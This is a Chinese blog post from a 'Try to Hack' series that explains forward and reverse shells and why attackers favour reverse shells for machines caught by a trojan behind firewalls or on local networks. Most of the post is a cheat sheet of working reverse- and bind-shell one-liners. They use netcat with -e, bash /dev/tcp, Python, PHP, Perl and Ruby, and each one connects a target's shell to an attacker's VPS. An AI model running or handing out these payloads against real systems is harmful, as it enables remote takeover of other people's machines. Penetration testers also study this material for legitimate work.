【Try to Hack】正向shell和反向shell

举报
开心星人 发表于 2022/06/28 21:31:51 2022/06/28
【摘要】 📒博客主页:开心星人的博客主页🔥系列专栏:Try to Hack🎉欢迎关注🔎点赞👍收藏⭐️留言📝📆首发时间:🌴2022年6月26日🌴🍭作者水平很有限,如果发现错误,还望告知,感谢!文章内容均来自互联网,仅作为自己学习的使用。更多内容看这篇@toc 正向shell和反向shell正向shell:控制端主动发起连接去连接被控制端反向shell:被控制端主动连接控制端(大多数情...

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月26日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章内容均来自互联网,仅作为自己学习的使用。更多内容看这篇

@toc

正向shell和反向shell

正向shell:控制端主动发起连接去连接被控制端
反向shell:被控制端主动连接控制端(大多数情况为连接vps,因为攻击者电脑通常没有公网IP所以不能进行连接)

大多采用反向shell。在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会被拦截。

反向shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

什么时候进行反向shell?
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.它的ip会动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

正向shell

目标主机上打开4444端口

nc -lvp 4444 -e /bin/bash                  // linux
nc -lvp 4444 -e c:\windows\system32\cmd.exe      // windows

在本地或者VPS主机上连接目标主机的4444端口

nc 目标主机ip 4444

反向shell

在本地或者VPS主机上监听本地9999端口

nc -lvp 9999

目标主机上输入如下命令,连接VPS或主机的9999端口

nc vps或主机的ip 9999 -e /bin/sh							//linux
nc vps或主机的ip -e c:\windows\system32\cmd.exe			//windows

在目标主机中没有nc时获取反向shell

VPS或本地主机上监听2222端口

nc -lvp 2222

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps或本地主机的ip",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

bash

bash -i >& /dev/tcp/vps或本地主机的ip/2222 0>&1

php

php -r '$sock=fsockopen("vps或本地主机的ip",2222);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

perl

perl -e 'use Socket;$i="vps或本地主机的ip";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby

ruby -rsocket -e 'c=TCPSocket.new("vps或本地主机的ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
或
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("vps或本地主机的ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。